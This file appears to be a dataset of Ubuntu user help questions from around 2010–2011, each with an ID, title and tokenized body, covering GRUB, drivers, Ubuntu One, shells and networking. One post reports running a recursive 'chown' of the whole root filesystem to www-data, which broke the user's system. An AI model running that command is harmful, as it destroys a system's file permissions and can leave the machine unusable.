19635	grub shows same linux image twice	after a recent update , i get multiple entries for same linux kernel version in the boot menu . i have tried running update-grub2 but it also lists the same linux-image version twice i.e adnan @ adnan-laptop : /boot $ sudo update-grub2 generating grub.cfg ... found linux image : /boot/vmlinuz-2.6.32-26-generic found initrd image : /boot/initrd.img-2.6.32-26-generic found windows 7 ( loader ) on /dev/sda1 found linux image : /boot/vmlinuz-2.6.32-26-generic found initrd image : /boot/initrd.img-2.6.32-26-generic found memtest86+ image : /boot/memtest86+.bin done as you can see vmlinuz and initrd are found multiple times . but there is only one vmlinuz and initrd file in /boot adnan @ adnan-laptop : /boot $ ls -l total 15120 -rw-r -- r -- 1 root root 646144 2010-11-24 15:58 abi-2.6.32-26-generic -rw-r -- r -- 1 root root 110601 2010-11-24 15:58 config-2.6.32-26-generic drwxr-xr-x 3 root root 4096 2011-01-01 18:59 grub -rw-r -- r -- 1 root root 8335528 2010-12-20 23:36 initrd.img-2.6.32-26-generic -rw-r -- r -- 1 root root 160280 2010-03-23 14:40 memtest86+.bin -rw-r -- r -- 1 root root 2156100 2010-11-24 15:58 system.map-2.6.32-26-generic -rw-r -- r -- 1 root root 1336 2010-11-24 16:00 vmcoreinfo-2.6.32-26-generic -rw-r -- r -- 1 root root 4050080 2010-11-24 15:58 vmlinuz-2.6.32-26-generic can some one tell me why does update-grub2 finds vmlinuz and initrd twice ? and how to stop this from happening . update : find grub.cfg here
19639	why documentation says release is 11.04 instead of 10.10	i went to the desktop menu and opened system- > about ubuntu to read more . it says you are using ubuntu 11.04 when i am using 10.10 . why is that so ? update : this has been fixed !
19640	problem with aptoncd application	i created a iso image using aptoncd & burned it to a dvd . now when i tried to restore , the program does not detect the dvd in the drive . it shows `` please insert a disc in the drive . '' and if we click `` ok '' it shows e : failed to mount the cdrom . the dvd is in the drive itself . i tried sudo lshw -c disk and the output is : *-cdrom description : dvd-ram writer product : dvdram gh22ns50 vendor : hl-dt-st physical id : 1 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/scd0 logical name : /dev/sr0 logical name : /media/aptoncd logical name : /media/apt version : tn02 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 mount.fstype=iso9660 mount.options=ro , relatime , uid=1000 , gid=1000 , iocharset=utf8 , mode=0400 , dmode=0500 state=mounted status=ready *-medium physical id : 0 logical name : /dev/cdrom logical name : /media/aptoncd logical name : /media/apt configuration : mount.fstype=iso9660 mount.options=ro , relatime , uid=1000 , gid=1000 , iocharset=utf8 , mode=0400 , dmode=0500 state=mounted then i checked in disk utility application . in that dvd rom is shown as /dvd/sr0 my ubuntu version is 10.10 . please help me to solve the problem .
19643	how do i use ubuntu one beta in windows	in ubuntu , my ubuntu one account shows up in the file manager as a place like any other accessible directory . how do i get it to show up in windows 7 the same way using the ubuntu one beta ? do i need to map it in windows explorer as a network drive , or ... ? a pointer to the right how-to or manual would be fine . i do n't mind rreading the manual if i can find it .
19649	will you be able to drag unwanted files unto the trash on the unity launcher ?	when unity for natty is finished , will there be a feature to drag and drop unwanted files into the trash that is docked on the launcher ?
19655	panel not found [ installed netbook edition by mistake ]	i installed the ubuntu 10.10 on my laptop . 1st time ubuntu user ever . after successful installation only panel on top with small ubuntu logo on left and system/connections , time , keyboard , volume icons/ on right . no menu and not able to create menu . right click on the panel - no options . i tried everything , but it could be the most basic think as i have no experience with ubuntu .
19659	installing rubygems 1.9.1	i have successfully installed ruby1.9.1 but after downloading the .tgz archive offered here and doing sudo ruby1.9.1 setup.rb i get this : /home/elliot/downloads/rubygems-1.4.1 ( 2 ) /lib/rubygems/source_index.rb:62 : in `installed_spec_directories ' : undefined method `path ' for gem : module ( nomethoderror ) from /home/elliot/downloads/rubygems-1.4.1 ( 2 ) /lib/rubygems/source_index.rb:52 : in `from_installed_gems' from /home/elliot/downloads/rubygems-1.4.1 ( 2 ) /lib/rubygems.rb:914 : in `source_index' from /home/elliot/downloads/rubygems-1.4.1 ( 2 ) /lib/rubygems/gem_path_searcher.rb:98 : in `init_gemspecs' from /home/elliot/downloads/rubygems-1.4.1 ( 2 ) /lib/rubygems/gem_path_searcher.rb:13 : in `initialize' from /home/elliot/downloads/rubygems-1.4.1 ( 2 ) /lib/rubygems.rb:873 : in `new' from /home/elliot/downloads/rubygems-1.4.1 ( 2 ) /lib/rubygems.rb:873 : in `searcher' from /home/elliot/downloads/rubygems-1.4.1 ( 2 ) /lib/rubygems.rb:495 : in `find_files' from /home/elliot/downloads/rubygems-1.4.1 ( 2 ) /lib/rubygems.rb:1034 : in `load_plugins' from /home/elliot/downloads/rubygems-1.4.1 ( 2 ) /lib/rubygems/gem_runner.rb:84 : in ` < top ( required ) > ' from < internal : lib/rubygems/custom_require > :29 : in `require' from < internal : lib/rubygems/custom_require > :29 : in `require' from setup.rb:25 : in ` < main > ' why is installing rubygems with ruby1.9.1 so painful ? how can i install it correctly ? thanks in advance , ell .
19660	can you add separators to docky ?	is it possible to add more separators to docky ? if so , how ? i 've checked through the preferences window but i did n't see anything about adding separators there .
19662	resuming from hibernation shows a fuzzy `` static '' screen	when i resume from hibernation in ubuntu 10.10 the screen shows static , very similar to what you see on an analogue tv that has n't been tuned properly . this also occurs on boot from shut down , but only for a moment after the plymouth boot screen . the static lasts for at least 5 minutes . an odd thing that happens is that the mouse pointer , as a lighter square of static , becomes visible and you can move it around . attempting to change into a terminal ( i.e . ctrl+alt+f1 ) does n't seem to work ( and i 'm not sure if that can be done from the login screen ) . resuming from suspend has different issues - vertical lines appearing for a second before appearing to be in terminal mode ( blinking cursor ) and then going to the lock screen . i 'm running ubuntu 10.10 on a dell studio 15 with ati graphics , however i 'm not using the proprietary drivers as i had issues with dual-screen support , so it 's the generic x.org drivers being used .
19664	questions asked during update or upgrade	what questions are asked during the update or upgrade process ? it would be good to know beforehand in case we choose the wrong option when asked and there is no turning back .
19666	modify multiple images from console	i know convert changes from a image format to another . mogrify can resize and scale multiple images also . but how can i modify all images inside a directory , including the sub-directories . like for example change every image inside a folder and its sub-folders from one format png to another format jpg . or resize all pictures in a folder and its sub-folders to a desire one .
19668	troubleshooting wireless network connectivity	i 'm currently running ubuntu 10.10 , and i 'm running into trouble keeping my wireless connection alive . after rebooting , i get about 5-10 minutes of a good speed connection ; afterwards , the connection just zeroes out . i 've gotten around to stirring up a shell script that gives me another 10 minutes or so of connectivity . script contents below : # ! /bin/bash sudo ifconfig wlan0 up echo `` enabling wireless device . . . '' sleep 5 sudo iwconfig wlan0 essid mynetworkname echo `` connecting to network . . . '' sleep 10 sudo dhclient wlan0 echo `` getting ip address . . . '' sleep 5 echo `` done . closing window . . . '' sleep 5 shortly after running the line `` sudo iwconfig wlan0 essid mynetworkname '' from the script , i notice the speed pick up . other computers in my home running windows xp are not affected by this problem , so all indications point to my ubuntu machine . does anyone have any pointers as to how to resolve this ?
19669	acer 7551g - hibernation and suspending do n't work	issue is quite the same like here , i 've tried everything i found and nothing happens . if i use uswsusp , suspending works good , but graphics does n't wake up , when i want to hibernate system , it tells me `` looking for splash system ... none s2disk : snapshotting system '' and nothing happens . i 'm using ati drivers , i 've tried to disable kms , unload usb3 and network drivers , still nothing . please help me , i do n't want to come back to windows after my 2-year-relationship with linux . i can share all files i have with you , just help me .
19671	command line option to check which filesystem i am using ?	is there a command that will show which file system ( ext3 , ext4 , fat32 , ... ) the various partitions and disks are using ? similar to how sudo fdisk -l lists information about disks and partitions ?
19672	how to close lid without triggering standby one time only	related : how can i tell ubuntu to do nothing when i close my laptop lid ? i have my laptop set to activate standby when i close the lid . i want to keep this as the default for both battery and ac power . but occasionally i want to close the lid without triggering standby ( eg . while just listening to audio ) . is there someway i can tell ubuntu , `` i 'm going to close the lid now . do n't stand by this time '' , without altering the defaults ( because i almost always forget to change them back ) .
19674	flashplugin works on youtube but not on website i belong to to watch training videos	i can watch video on youtube with the flash-plugin , but i can not watch video on a training website that charges monthly for access . i was able to watch video on that site before i switched to ubuntu last week . hope someone has the answer for me ... many thanks .
19675	any way to consolidate multiple .trash directories	i have a seperate data partition with a functioning .trash directory . but ~/.local/share/trash is the only directory seen by trash : /// in nautilus . here 's the fstab entry for the partition : uuid=86cf7ec3-c911-4eb9-badb-cb039f975d1d /mnt/ ext4 nodev , nosuid 02
19676	using ubuntu one to synchronise htdocs ?	i 'm new to linux . i 've got xampp installed on ubuntu 10.10 in /opt/lampp/ . i 'd like to synchronise the files in /opt/lampp/htdocs/ with ubuntu one ( and i 've bought 20gb in preparation ) , but there 's no option to sync the folder . any ideas ?
19677	difference between dhclient & dhclient3 ?	well , i stumbled upon a command that connects your wired connection from the command line by issuing this in the terminal ; `` sudo dhclient3 eth0 '' . but there is also a command called `` dhclient '' . are they the same ? could i issue the same command as ; `` sudo dhclient eth0 ? '' could someone clear up newbie on this issue ?
19680	change keybindings ( hardware to software )	i ran a search for this , but the answers i saw were referring to something altogether different than what i 'm asking for . so let me clarify : i 'm not asking how to change key-combo shortcuts . i 'm asking -- how do you actually change what your computer thinks you did when you press a given key ? an example of what i mean ( and the reason i 'm asking ) . i 'm a chrome user , and i use windows alongside ubuntu . i own a lenovo thinkpad t61p -- it came with my scholarship package , and i would have shopped for a nice computer if i could have . the t61p has two buttons above the left and right arrow keys that relate to browser commands to go back and forth one page . this is extremely frustrating for me , as i use the arrow keys , and a single accidental keystroke will catch me going back a page , losing temporary data , and yelling at my stupid keyboard . at the same time , i 'm the type of person who keeps way too many tabs open . chrome does n't let me refigure keyboard shortcuts , and the only way it allows you to switch between tabs are ctrl+tab and ctrl+shift+tab , and ctrl+page up/down . i was using notepad++ , and they had finally found the solution to both problems ! the page back and forth keys functioned as tab back and forth keys . i went through quite some effort to learn how to change the keybindings in windows . the page back and page forward keys are now the page up and page down keys , respectively , and if i hit control , they let me switch tabs easily , and rather pleasantly . and if i hit the keys by accident , no harm , no foul . alas , i 'm in ubuntu now , and i need to go through the process again . and while i could n't just find the answer online , like i did for windows , i know ubuntu has nice , supportive communities like this one , where , hopefully , somebody can tell me how to do either what i did in windows , or directly make it so that my computer changes tabs when i hit those buttons ( removing the ctrl button from the tab-changing command ) .
19681	how can i mount a virtualbox harddisk ?	i have a virtualbox harddisk , let 's say here : ~/harddisk/ubuntu.vdi how can i mount it using fuse , so that it 's accessible from the host pc ? please assume that i 've almost no knowledge about fuse and mounting .
19685	disadvantages of using custom patched kernel	on my dell laptop i have to use tuxonice to get hibernation and suspend work because default kernel and uswsusp is not working for me . tuxonice is working good . but i want to know that what are disadvantages of custom patched kernel . am i going to get the updates ? what if where natty will be released , is it going to break my whole system ?
19690	skip hitting enter at the boot option and directly boot the system	i have recently installed ubuntu 9.10 desktop edition . i had to do manual shutdown pressing the power & reset button 2-3 times . so when ever i power on the system , the system waits at the boot menu till i hit enter . i think there may be some tricks so that i can skip the boot option and directly boot the system without needing to hit enter at the boot option ? . any help ...
19691	extremely slow upload speeds in nautilus with ftp	i was at home uploading a wp site and it 's maxing at 4.2kb . i did a speed test and im getting ~1mb upload ( my home isp caps it out at that ) . i uploaded a 5mb file via chrome , to test , and it uploaded within 2 mins . the file uploaded was a wordpress.xml file through the uploader . same file in nautilus is taking forever . to upload this wp site and all the plugins took 1 hour . any ideas of why or how ? p.s . i 've been using my hosting company also for years and they 've never had any speed issues uploading .
19692	system displays `` file system maintenance error , press ctrl+d '' while booting	in my office i 've ubuntu 8.10 desktop installed and it 's running for a long time . when ever the system is started , i 'll get a file system maintenance error and something it 's prompted for the root password or ( press ctrl+d to continue ) . after pressing ctrl+d the system normally boots up . i could not resolve this issue for a long time and i think something should be done in the fstab file . i 'm not sure to do anything and expecting the experts here to help to perfectly fix this . any help is appreciated . thanks !
19694	what is needed for a networked home printer ?	i 've seen this question : home network printer recommendations but i think i 'm asking something more basic . i 'm not really familiar with networked printers or how they work or what they do really . what i 'd like is to have a printer that is accessible to anyone connected to my home network , without having to plug into the printer itself . an alternative setup might to be to have a printer that is always hooked up to one computer , like a desktop , that is almost always on and allows other computers connected on the network to print to it as well . i believe the first option is called a networked printer and the second is printer sharing . but again i 'm new to this so i do n't really know the details or if i 'm using the correct terminology . i was wondering if someone might be able to shed some light on this and let me know what is needed for either of these setup . thanks .
19697	how to log in after wrongly modifying path	i wanted to add a path so that the system could find some manually installed executable . however , instead of typing path=xxx : $ path ; export path at the end of ~/.profile where xxx is the directory in which the executable lies , i wrongly used path=xxx ; export path . after i logged out i was unable to log in the usual way . how can i fix this instead of reinstalling ?
19699	how to view results of last clamscan scan ?	i scanned pen drive using clamscan and i closed the terminal after scanning without reading the result . now one of my folders on the pen drive is missing . i wanted to know if clamav deleted it . so i want to view the last scan result .
19700	broken packages : php-apc : depends : phpapi-20090626+lfs	i need to install php-apc on ubuntu 10.04 and ubuntu 9.04 first of all , can i just install this package to make it work with php 5.2 + lighttpd on these ubuntu versions ? i 've tried to install it on ubuntu 10.04 and i get the following error : sudo apt-get install php-apc the following packages have unmet dependencies : php-apc : depends : phpapi-20090626+lfs e : broken packages thanks
19704	`` bad idea '' warning when trying to recover grub , after windows removed it	tried sudo grub-install on sda1 but it complained about being a bad idea . i had to install windows for a work related issue so i used a separate disk ( i had used it for ubuntu on this computer , but bought a bigger disk so installed ubuntu on that and left the old one in in case i needed an old file ) . windows installed fine but overwrote grub . so if i choose the ubuntu disk to boot first in bios i get a blank screen . i googled and followed this advice : https : //help.ubuntu.com/community/recoveringubuntuafterinstallingwindows however , when i get down to this section : sudo grub-install -- root-directory=/media/0d104aff-ec8c-44c8-b811-92b993823444 /dev/sda1 i get this : attempting to install grub to a partition instead of the mbr . this is a bad ideaâś -- recheck does nothing . any ideas ?
19710	setting up ubuntu as a wireless accesspoint	i have an android phone which does n't connect to ad-hoc networks . i use ad-hoc network to share internet among my pcs . i want to setup my ubuntu laptop as a wireless access point . but i do n't want my ubuntu laptop to be a router as described here as i 'll be using suid3 as a http proxy . it should be just a wireless accesspoint which broadcasts it 's ssid like a home wireless router . the ubuntu laptop has athros wireless card which requires athk9 driver .
19711	how can i listen to a specific signal in rhythmbox ?	i want to listen to the key press of lets say ctrl+w in rhythmbox , and call a functions if that happens . how can i do that in python ?
19716	svn with lighttpd web server ?	i need to install svn on ubuntu 10.04 and ubuntu 9.04 . on both servers i use lighttpd . i found some tutorials on internet explaining which packages to install with apache , but i actually need lighttpd . thanks
19717	ca n't access any functions after chown command	i am not being to access any functions in my desktop and i do n't have an os besides ubuntu and i am new to ubuntu . i think i rebooted my computer thinking that google chrome crashed . i opened google chrome but it showed opening message but never opened so i restarted my computer . and when my system was loading ( i was playing with keyboard dont know what i typed ) and when by ubuntu loaded , i was unable to access anything some of characteristics are listed below : i can not hear any sound i can not access wired ethernet connection on the right corner where i usually enable to access internet and i have no internet . there is no local apache server either . when ever i try to start apacer i get setuid must be root or something . when i type sudo then i get message setuid must be root . i can not access orther external storage devices like pendrive and portable hard drive and can not mount my other drives with fat32 filesystem . when i try to start my apache webserver with out typing sudo then i get message cannnot open socket or something like it . i remember also doing command chown -r www-data / earlier and got error message i can not shutdown my computer , it only logs off
19718	how to activate pagination for ls command ?	what is the equivalent option for the ls command to activate pagination as in dos the dir /p does ?
19720	possible to automatically display the correct days of the week ?	i 'd like to tweak my conky so it automatically displays the days of the week correctly . so for example , if today were tuesday , it would look like this : tuesday wednesday thursday friday [ etc . ] and then tomorrow , automatically , it would look like this : wednesday thursday friday [ etc . ] i know i can get it to display today 's date like this : $ { time % a } but how do i get it to display tomorrow 's date ? thanks so much for any help/suggestions .
19724	how to configure xchat and irc server to transfer files ?	how do i configure xchat to send files ? my setup : hardware router : xxx.xxx.xxx.xxx example.com | ubuntu server with irc server : 192.168.1.2 local machines : 192.168.1.x my aim is to allow to send files between the local machines . by now , they are able to talk on the local irc channel . which ports do i need to open on the router ? what do i need to configure on the server ? how to configure xchat on the clients ? how to troubleshoot/debug the problems ?
19726	how do i get one monitor on top of the other ?	i 'm using a laptop and a monitor ( wall mounted ) over my laptop . i would like to reflect this physical hardware setup in my software screen setup . so that i can move my mouse upward , out of my laptop screen and use the monitor on the wall . i have been searching for a solution for a while , and i hope somone can help me out . i 'm using ubuntu 10.10 `` out of the box '' . side by side screen setups works just fine , over/under is does n't work .
19727	u1 bandwidth limit not enforced	in u1 preferences , setting `` limit bandwidth '' option is ignored by sync service , ie . although the preferences show a limit of 30 kbps , u1 is uploading up to 350 kbps , although all files appear to be already synced . this causes massive slowdowns among the home network , rendering it nigh unusable .
19728	differences between fish and bash to pass commandline arguments to alias functions ?	from the answers to my other question here i learned about the possibility to pass commandline arguments to a alias function in bash . in fish i can edit an alias by editing the file config.fish in ~/.config/fish directory and adding a line like this alias lsp='ls -ah -- color=always | less -r ; ' and it works perfectly . this should be the equivalent to editing ~/.bash_aliases in bash but when i try to setup an alias function to pass arguments like this alias lsp='_ ( ) { ls -ah -- color=always $ * | less -r ; } ; _' it does n't work for fish ? are there any differences between fish and bash in the way to setup an alias to pass commandline arguments that prevent this second alias from working with fish instead of bash ?
19731	`` sudo cd ... '' one-liner ?	occasionally i want to cd into a directory where my user does not have permission , so i resort to sudo . the obvious command sudo cd somedir does n't work : $ sudo mkdir test $ sudo chmod go-rxw test $ ls -l drwx -- -- -- 2 root root [ ... snip ... ] test $ cd test -bash : cd : test : permission denied $ sudo cd test sudo : cd : command not found using sudo su works : $ sudo su # cd test is it possible to make this into a one-liner ? ( not a big deal , just idle curiosity : ) the variations i tried did n't work : $ sudo `` cd test '' sudo : cd : command not found $ sudo -i cd test -bash : line 0 : cd : test : no such file or directory $ sudo -s cd test the last one does n't give an error , but it cd 's within a new shell that exits by the end of the line , so it does n't actually take me anywhere . can someone enlighten me as to why this happens ? why is sudo cd not found , when for example sudo ls ... works fine ?
19732	is there an alternative to refit ?	is there an alternative to refit as a bootloader where you can choose between os x and ubuntu ? i already installed ubuntu on my mac with refit , so if there 's a better option , i can remove it now . i 'm exploring , mainly because i want one with a more appealing ui . other improvements are still very much welcome , though .
19737	using another browser than w3m for reading html helpfiles ?	i 'm using fish as shell . the internal help is based on html files and when i type help it opens w3m to view this help files . since w3m is not my default browser i wonder where this configuration to start w3m for this is stored . i 'd like to read the helpfiles with another browser . how can i setup another one for this purpose or perhaps where are the helpfiles located so i can open them manually in the browser .
19740	where does ubuntu store the picture that i set as my desktop ?	i have a pretty picture set as my desktop background , but i 've lost the original file . however , my desktop is still set to this picture . how can i get back my picture ?
19745	problem with installing programs	i am unable to install programs for the ubuntu 10.10 system . the download is ok , but when attempting to install them , the following message is displayed , an error occurred while opening the archive end-of-central-directory signature not found etc ... ... . zipinfo : can not find zipfile directory in etc ... ... as i am new to ubuntu and also fairly `` green '' as far as computer terminology is concerned , i have no idea what this means and do n't have a clue on how to fix it . can you help please ? many thanks , brian buck
19750	how can i make a shortcut key to disable the mouse pad ?	i have a dm3t laptop and when im using the keyboard i frequently accidentally touch it and cause some mouse event . how can i make a shortcut key that toggles the mousepad on and off ?
19755	hp touchsmart tm2 screen not working	i recently installed ubuntu on my new hp touchsmart tm2 , the installer worked fine , but upon first boot the screen would be completely black , though you can hear the login sounds and everything of the like , just the screen wo n't work . tried connecting the computer via hdmi to my tv screen , and that was to no avail as well , any solutions ?
19757	which audioplayer do you recommend to listen audiobooks ?	i 'm searching for a good audioplayer in ubuntu which is able to remember the position it stopped last playing , to resume play even after you closed the application . which one would you recommend ?
19760	fast file copier with samba support ?	i 'm looking for a fast file manager for ubuntu . i need to copy a lot of files to windows machine via samba . nautilus is so slow , that when i click on the directory i need to copy the screen just dims and takes forever to list the files . any recommendations , except compiling mc from source ? maybe some terminal command ?
19764	how does one set up a midi keyboard	i would like to set up my keyboard via my midi-sport 2x2 , i 've plugged everything in and even installed the midisport-firmware package which was not automatically installed for some reason . the goal is to have the computer produce a piano sound when keys of the keyboard are hit . if you can make this work without jack , that would be good too . step by step instructions , the less complexity the better .
19767	synaptic opens with `` starting without administrative privileges	when i try to open synaptic from the awn cardapio applet menu it gives me the 'starting without administrative privileges ' message and then i ca n't install anything . i can run sudo synaptic and it works fine , but how can i get it to just prompt me for my password like it used to ? i do n't like having to open terminal just to open synaptic . any ideas ?
19770	how do i change fonts and adjust their size ?	i 've been finding fonts on the internet and installing them on my system . what 's the easiest way to change my fonts ? i would prefer an easy to use graphical way , but answers with command line recommendations are also welcome .
19772	how to reinitialize a terminal window instead of closing it and starting a new one ?	when i make some changes to the shell/bash behavior . i.e . set up an alias , what quick way does exist to reinitalize the terminal window instead of closing and open a new open ? perhaps a commandline solution ?
19774	how can i automatically shutdown the system after a specific time ?	how can i automatically shutdown the system after a certain customizable time ?
19781	unused services to disable after a fresh installation ?	are there any services after a fresh ubuntu install , that are probably by most of the standard users not needed , so that you could recommend to disable them ?
19783	automatically close application after custom time ?	is there a way to automatically close a certain application after custom time ? update : i.e . stop the audioplayer after a certain time .
19787	how can i fix the cd/dvd refresh for the media drive so that it is recognized automatically ?	i have recently installed ubuntu 10.10 64bit and it seems to work flawlessly . but today i tried to check some cds and i was surprised that ubuntu does n't automatically refresh the cd/dvds inserted in my media drive . i had to eject manually from the cd/dvd desktop icon > right click > eject and then insert the new cd and only then ubuntu reads the data in the newly inserted cd/dvd . how can i fix the cd/dvd refresh for the media drive so that ubuntu 10.10 recognize it automatically ?
19789	restoring grub2 on software raid 0 using livecd after windows 7 wiped it	i have installed ubuntu 10.10 on my system . however , i need to install windows 7 back , and i expect that it would alter grub and it did . right now , my partition on my software raid 0 looks like this : nvidia_acajefec1 is ubuntu 10.10 and nvidia_acajefec3 is windows 7 . i 've been following some guides around and i am always stuck at grub not able to detect the usual raid content . i 've tried running : sudo grub > root ( hd0,0 ) grub complains it could n't find my hard disk . so i tried : find ( hd0,0 ) and it complains that it could n't find anything . so i tried : find /boot/grub/stage1 it said `` file not found '' . here 's the text from the console : ubuntu @ ubuntu : ~ $ grub probing devices to guess bios drives . this may take a long time . [ minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists the possible completions of a device/filename. ] grub > root ( hd0,0 ) root ( hd0,0 ) error 21 : selected disk does not exist grub > find /boot/grub/stage1 find /boot/grub/stage1 error 15 : file not found **fortunately , i got one person suggesting that what i 've been trying to do is for grub legacy , not grub2 . so i went to the suggested website , ( http : //grub.enbug.org/grub2livecdinstallguide ) try to look around , and try : ubuntu @ ubuntu : ~ $ sudo fdisk -l unable to seek on /dev/sda this is just the step 2 of the instruction in the http : //grub.enbug.org/grub2livecdinstallguide and i can not proceed because it can not seek /dev/sda . however , ubuntu @ ubuntu : ~ $ sudo dmraid -r /dev/sdb : nvidia , `` nvidia_acajefec '' , stripe , ok , 488397166 sectors , data @ 0 /dev/sda : nvidia , `` nvidia_acajefec '' , stripe , ok , 488397166 sectors , data @ 0 so what now ? do you have an idea for how to make fdisk see my raid array on live cd ( ubuntu 10.10 ) ? honestly , i am lost , very lost in trying to restore grub2 on this software raid 0 system right now .
19791	computer shows up twice , connection unknown	added two computers to ubuntu one . one machine is windows . the windows version seems to work fine , and i started syncing a folder by placing it into the ubuntu one folder . all files and folders are visible when i go to my account online . on ubuntu machine . i selected to sync the download folder . shortly thereafter , i realized that one folder exceeded my storage max . i tried to un-sync the folder , but ubuntu one and the stop syncing this folder were not visible in the menu . per ubuntu instructions , i removed my ubuntu computer from the list of syncing computers . per ubuntu instructions , i re-added the ubuntu computer . however , i find that two computers by the same name are added on both the desktop app and on the web . plus , i the connection is `` unknown . '' i have removed and re-added the computer several times with the same results . in all cases , i remove the computers using the ubuntu one desktop app , then removing them from my account on the web , removing the ubuntu one password , and restart the ubuntu one app . problem remains . thanks in advance for any replies and help .
19792	duplicated entries in ubuntu one	i recently started using ubuntu one . somehow , when i look at ubuntu one preferences- > devices , one of my laptop computers is listed twice . when i visit my ubuntu one account via web , `` computers on your account '' also lists that particular laptop twice . i am wondering why this happens , and whether i can remove one of them . thank you very much for your help ! bvp
19796	filesystem types for partitions	i am going to dual-boot install ubuntu1 10.04 on my laptop with windows 7 . i was wondering what filesystem types ( such as ext2 , ext3 , ext4 , reiserfs and whatever might come into mind ) are recommended for various possible partitions ( such as / , home , /boot , swap , and others that might come into mind ) and why ? if ext4 is now stable enough for use for partitions in ubuntu and shared partition between windows and ubuntu ? what journaling options ( writeback , ordered and journal ) are recommended for each partition 's filesystem ? thanks and regards !
19798	apt-get update stuck on `` waiting for headers '' when using windows xp ics	i 'm setting up a maverick server on a spare pc . the install completes fine and the system boots up into the shell . however , when i try to do a apt-get update , apt hangs on almost every entry with the message 99 % [ waiting for headers ] sometimes a message of 96 b/s appears on the far right . the actual percent that it claims also varies . searching around online gave a potential solution by using the option acquire : :http : :pipeline-depth= '' 0 '' this somewhat alleviates the problem , i.e . it stalls on every other entry with the same message as above . if you wait it out ( the whole update took about 4 hours ) , the update still fails as a good portion of the hits show a `` unable to connect '' or similar message , despite the fact that i can ping the server from the pc just fine . the problem is also unrelated to the mirror used since i 've tried about a dozen mirrors with no success , i 've even tried commenting out everything but the main entry in sources.list and it still refuses to update . the network connection is fine since i can ping and wget ( apt wo n't let me install lynx until i run a successful update ) just fine . i 've also reinstalled the distro with no luck . the only thing weird about the setup is that the pc is connecting to the internet through my windows laptop with ics configured properly , but as i 've said before , the network connection is fine .
19803	for better performance should i install 32-bit or 64-bit ?	i do n't know much about 32 bit and 64 bit . i had been using 32 bit and it 's crashed ( not working properly and i do n't know how to recover ) question here ... .. and i do n't have backup and i run on 3.2 dual core intel processor can you recommend me which would be better , and i do web development ( php and mysql ) and learning python .
19804	with a typical usb hard drive enclosure , is the full range of drive power management functionality available ?	in what may be an unrelated matter : is it possible to suspend a pc without unmounting an attached usb-powered drive , and then remounting it on resume ? this is the behaviour i 'm currently seeing ( running ubuntu linux 10.10 ) . are there certain models or brands that provide more complete control over this aspect of drive operation ? my friendly neighbourhood computer store carries ( part of ) the vantec nexstar product line .
19808	how to reinstall ubuntu keeping my data intact ?	i want to reinstall ubuntu keeping my data intact . i have 160 gb hardrive ( sata or pata i do n't know but it 's slim and made in china ) with a 40 gb ext3 partition , a 4gb swap memory and 3 other partition with a fat32 file system . i have around 4gb space on my drive where linux is installed . i 'd like to keep the data intact , especially the downloads folder , desktop , and /var/www ; and i no longer have access to any other machines or external storage devices .
19812	music bought from ubuntu one music store stuck on `` transferring to your ubuntu one storage ''	i bought music from the ubuntu one music store , and the status of the downloads are stuck at `` transferring to your ubuntu one storage '' under the `` my downloads '' section of ubuntu one music store . i can see the music bought from the web interface , but i 'm unable to synchronize it onto my machine . i 've tried this without success . has this problem been reproduced at all other than by me ?
19813	monitor turning off instead of activating the screensaver , how do i prevent it ?	i have a screensaver configured to activate after 5 minutes . when the time elapses , instead of activating the screensaver , my monitor turns off . i tried playing with settings , and searching the internet , but i could n't find anything and could n't figure out how to solve this issue . can someone help ?
19817	how can one get involved in the ubuntu brainstorm team ?	i 've heard it thrown around on a lot of blogs that ubuntu brainstorm is the `` graveyard of good ideas '' . i have a bit of a passion for average end-users suggesting the kinds of software they want and they way they think their applications and computers could work . i 'm interested in joining the ubuntu brainstorm team , maybe to facilitate ideas not getting buried and making it not seem like a dead platform . unfortunately i 'm not very plugged into the `` community '' so i 'm not sure how to go about it . i was hoping someone might be able to point me in the right direction . thanks .
19819	likewise : joined active directory but can not write shares	i have never used a linux system in an ad environment before and am trying to join my laptop running ubuntu to join our active directory ( dc is a windows server 2008 machine ) using likewise-open . using the gui wizard , i have joined the domain . i can mount network shares using cifs my fstab entry looks like this : //server/share /mnt/foo cifs auto , iocharset=utf8 , rw , credentials=/home/aron/.smbcredentials 0 0 problem : i only have read access to our fileserver . what more is needed to get the ad to recognize me as a user who has the appropriate rights ? any help is appreciated .
19823	how can i show the msn user picture in empathy ?	in empathy , i can use the default image in google talk . but , with msn , the picture did n't show . how can i config it to make it right .
19826	is there a ppa for vim 7.3 ?	vim 7.3 is out , and there 's a ppa for ubuntu 10.10 . is there a ppa for ubuntu 10.04 ?
19828	which architecture should i install on x86 64bit machine ?	i have a x86 64bit dell inspiration pc and it does n't contain a amd cpu . should i install `` amd 64 10.04 '' or `` x86 32 10.04 '' ?
19830	prevent new options being added to grub after kernel updates ?	every time i new kernel update is installed to my system , it adds itself again to the boot menu . right now my boot menu has 3 linux option , one for each kernel version . how can i avoid that new options to be added ?
19836	screen is rotated . how to adjust it ?	when i installed the ubuntu 10.04 amd 64bit , the screen is shifted to left and can not be fully showed on the monitor . i can not even seclect the list on the top pannel . how should i adjust it ?
19837	how to automate mysql backups ?	i want to automatize the backup of my databases and files with cron . should i add the following lines to crontab ? mysqldump -u root -ppassword database_name | gzip > /home/backup/database_`date +\ % m-\ % d-\ % y`.sql.gz svn commit -m `` committing the working copy containing the database dump '' 1 ) first of all , is this a good approach ? 2 ) it is not clear how to specify the repository and the working copy with svn . 3 ) how can i run svn only when the mysqldump is done and not before ? avoiding conflicts any other tip ? thanks
19840	how do you edit a full gnome panel ?	this seems like a silly question , but i 'd like to add a widget to my panel . normally one would right click on the panel and choose the correct option in the menu , but ... my panel is full and there 's no empty space to click on : p. how can i access the panel menu ?
19844	pc noisy due to high load - why ?	i just installed an ubuntu on my pc ( dell inspiration i560sr-358 , with cpu e5700 3ghz , 4g memory , and nvidia geforce g310 ) . the pc becomes noisy before that it 's quiet with a windows 7 on it . how come ? how to set it to be quiet again in ubuntu 10.04 . one of the two cpu usage is always 100 % . i think that is the reason . //re-edit everything gets ok after i restart the computer.but the fan is still running which makes it noisy , if i switch to windows 7 , it becomes quiet again .
